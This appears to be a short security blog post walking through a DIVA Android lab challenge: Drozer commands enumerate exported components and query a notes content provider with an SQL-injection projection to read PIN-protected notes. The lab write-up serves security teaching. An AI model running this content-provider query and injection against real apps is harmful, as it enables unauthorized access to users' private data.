top of page
Search

Authentication Based Access Control Issues

  • Writer: Abhilasha
    Abhilasha
  • Jul 12, 2024
  • 1 min read

Challenge: Accessing PIN-Protected Notes Storage

  1. Objective:

  • Bypass PIN-based authorization to access sensitive notes without knowing the PIN.

  1. Tools:

  • Drozer: A tool for assessing the security of Android applications.

  1. Steps: Step 1: Check Attack Surface sh Copy code dz> run app.package.attacksurface jakhar.aseem.diva Step 2: Find Accessible Content Providers sh Copy code dz> run scanner.provider.finduris -a jakhar.aseem.diva Step 3: Query the Content Provider to Access Notes sh Copy code dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/ --projection "* FROM notes;--"

  • Results:

  • 3 activities exported

  • 1 content provider exported

Conclusion

By using Drozer, we were able to identify and exploit an exported content provider to access sensitive notes stored in the DIVA app without needing the PIN. This demonstrates the importance of properly securing content providers and other components in Android applications.

 
 
 

Recent Posts

See All
PE internals

Linked Libraries and Functions Imported Functions: Definition: These are functions used by a program that are actually stored in...

 
 
 
OS internals

Privilege Separation Concept: Modern operating systems separate user applications (untrusted) from critical operating system components...

 
 
 
Memory Management in short

Address Space CPU Access: To run instructions and access data in main memory, the CPU needs unique addresses for that data. Definition:...

 
 
 

Comments

Subscribe Form

Thanks for submitting!

©2021 by just dump 1. Proudly created with Wix.com

bottom of page